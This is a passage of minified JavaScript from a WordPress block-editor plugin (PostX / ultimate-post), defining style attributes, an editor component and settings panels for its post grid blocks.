a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallCat:{type:"boolean",default:!1},metaListSmall:{type:"string",default:'["metaDate"]'},showSmallMeta:{type:"boolean",default:!1},excerptShow:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse;justify-content: flex-end; }"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},headingText:{type:"string",default:"Post Grid #6"},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }{{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationShow:{type:"boolean",default:!1},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advFilter","pagiBlockCompatibility","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["paginationText","loadMoreText","paginationAjax","pagiMargin","queryNumPosts"],[{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:"emptyspace"},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreColor",default:"#fff"}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},96405:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(63230),r=l(91962),s=l(35341);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-6/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-6.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid6.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-6")]},edit:n.Z,save:()=>null})},12705:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(11070);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useRef:_,useState:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=_(null),[l,B]=C(f.Ti),[U,M]=C(null),{setAttributes:A,name:H,attributes:N,clientId:j,context:Z,isSelected:O,className:R,attributes:{blockId:D,excerptLimit:z,metaStyle:F,metaShow:W,catShow:V,showImage:G,metaSeparator:q,titleShow:$,catStyle:K,catPosition:J,titlePosition:Y,excerptShow:X,imgAnimation:Q,imgOverlayType:ee,imgOverlay:te,metaList:le,metaListSmall:oe,showSmallCat:ae,readMore:ie,readMoreText:ne,readMoreIcon:re,overlayContentPosition:se,showSmallBtn:pe,showSmallExcerpt:ce,metaPosition:ue,showFullExcerpt:de,layout:me,titleAnimation:ge,customCatColor:ye,onlyCatColor:be,contentTag:ve,titleTag:he,showSeoMeta:fe,titleLength:ke,metaMinText:we,metaAuthorPrefix:xe,titleStyle:Te,metaDateFormat:_e,authorLink:Ce,imgCrop:Ee,imgCropSmall:Se,fallbackEnable:Pe,vidIconEnable:Le,notFoundMessage:Ie,dcEnabled:Be,dcFields:Ue,previewImg:Me,advanceId:Ae,paginationShow:He,headingShow:Ne,filterShow:je,paginationType:Ze,navPosition:Oe,V4_1_0_CompCheck:{runComp:Re},currentPostId:De}}=e;function ze(e){B({...l,selectedDC:e})}function Fe(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function We(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function Ve(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function Ge(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),Ge()}),[]),T((()=>{const t=j.substr(0,6),l=L(I(j));(0,a.qi)(A,l,De,j),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[j]),T((()=>{const e=t.current;(0,b.o6)()&&0===N.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&(Ge(),t.current=N),e.isSelected!==O&&O&&(0,f.gT)(We,Ve)):t.current=N}),[N]);const qe={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:N,setSection:We,section:l.section,clientId:j,context:Z,setSelectedDc:ze,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){ze(e),Ve("dc_group")}};let $e;if(D&&($e=(0,m.Kh)(N,"ultimate-post/post-grid-7",D,(0,a.k0)())),Me&&!O)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Me});T((()=>{O&&Me&&A({previewImg:""})}),[e?.isSelected]);const Ke=x({...Ae&&{id:Ae},className:`ultp-block-${D} ${R}`,onClick:e=>{e.stopPropagation(),We("general"),Ve("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:qe,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:qe})),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-7",key:"layout",options:[{img:"assets/img/layouts/pg7/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg7/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg7/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Re?"exclude":"dep"]:a.N2,pro:["metaShow","catShow"]}],store:qe}),(0,o.createElement)("div",Ke,$e&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:$e}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ne||je||He)&&(0,o.createElement)(r.m,{attributes:N,setAttributes:A,onClick:()=>{We("heading"),Ve("heading")},setSection:We,setToolbarSettings:Ve}),function(){const e=`${ve}`,t=(e,t)=>(0,b.o6)()&&Be&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ue,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ve(t)},selectedDC:l.selectedDC,setSelectedDc:ze,setAttributes:A,dcFields:Ue});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${me}`},l.postsList.map(((l,a)=>{const r=0==a||3==a?JSON.parse(le.replaceAll("u0022",'"')):JSON.parse(oe.replaceAll("u0022",'"')),c=0==a?Ee:Se;return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ultp-block-item-${a} ${ge?"ultp-animation-"+ge:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.En,{imgOverlay:te,imgOverlayType:ee,imgAnimation:Q,post:l,fallbackEnable:Pe,vidIconEnable:Le,catPosition:J,showImage:G,idx:a,showSmallCat:ae,imgSize:c,layout:me,Category:(0==a||ae||3==a&&"layout4"==me)&&"aboveTitle"!=J?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:V,catStyle:K,catPosition:J,customCatColor:ye,onlyCatColor:be,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}})):null,onClick:()=>{We("image"),Ve("image")}}),Le&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{We("video"),Ve("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${se}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==J&&(0==a||ae||3==a&&"layout4"==me)&&(0,o.createElement)(i.Z,{post:l,catShow:V,catStyle:K,catPosition:J,customCatColor:ye,onlyCatColor:be,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}}),t(6,l.ID),l.title&&$&&1==Y&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{We("title"),Ve("title")}}),t(5,l.ID),W&&"top"==ue&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:q,metaStyle:F,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{We("meta"),Ve("meta")}}),t(4,l.ID),l.title&&$&&0==Y&&(0,o.createElement)(d.Z,{title:l.title,headingTag:he,titleLength:ke,titleStyle:Te,onClick:e=>{We("title"),Ve("title")}}),t(3,l.ID),(0==a||ce||3==a&&"layout4"==me)&&X&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:z,showFullExcerpt:de,showSeoMeta:fe,onClick:e=>{We("excerpt"),Ve("excerpt")}}),t(2,l.ID),(0==a||pe||3==a&&"layout4"==me)&&ie&&(0,o.createElement)(u.Z,{readMoreText:ne,readMoreIcon:re,titleLabel:l.title,onClick:()=>{We("read-more"),Ve("read-more")}}),t(1,l.ID),W&&"bottom"==ue&&(0,o.createElement)(p.Z,{meta:r,post:l,metaSeparator:q,metaStyle:F,metaMinText:we,metaAuthorPrefix:xe,metaDateFormat:_e,authorLink:Ce,onClick:e=>{We("meta"),Ve("meta")}}),t(0,l.ID),(0,b.o6)()&&Be&&(0,o.createElement)(v.Z,{dcFields:Ue,setAttributes:A,startOnboarding:Fe,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ie})}(),He&&"navigation"==Ze&&"topRight"!=Oe&&(0,o.createElement)(c.Z,{onClick:()=>{We("pagination"),Ve("pagination")}}))))}},11070:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(87025),d=l(92637),m=l(43581);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{queryType:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:s}}=t.attributes,{context:p,section:y,settingTab:b,setSettingTab:v}=t;return g((()=>{(0,u.CH)(p,n,t,r)}),[n,r,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(m.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6835",store:t}),(0,o.createElement)(d.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(d.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,exclude:["queryNumber","queryNumPosts"],store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(d.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:!0,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-7",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg7/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg7/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg7/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pg7/l4.svg",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:4,label:__("Number of Post","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:y.meta,exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:t,exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:t,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.fm,{store:t,include:a.aG}),!s&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:y.heading,depend:"headingShow"}),"posts"!=l&&"customPosts"!=l&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:y.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:y.pagination,depend:"paginationShow",store:t,include:[{position:3,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:3,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition","pagiMargin"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(d.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:c,titleShow:u,catPosition:d,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,u&&0==m,i&&"top"==b,u&&1==m,f&&"aboveTitle"==d];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["navMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleTypo","titleColor","titleHoverColor","titleBackground"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta 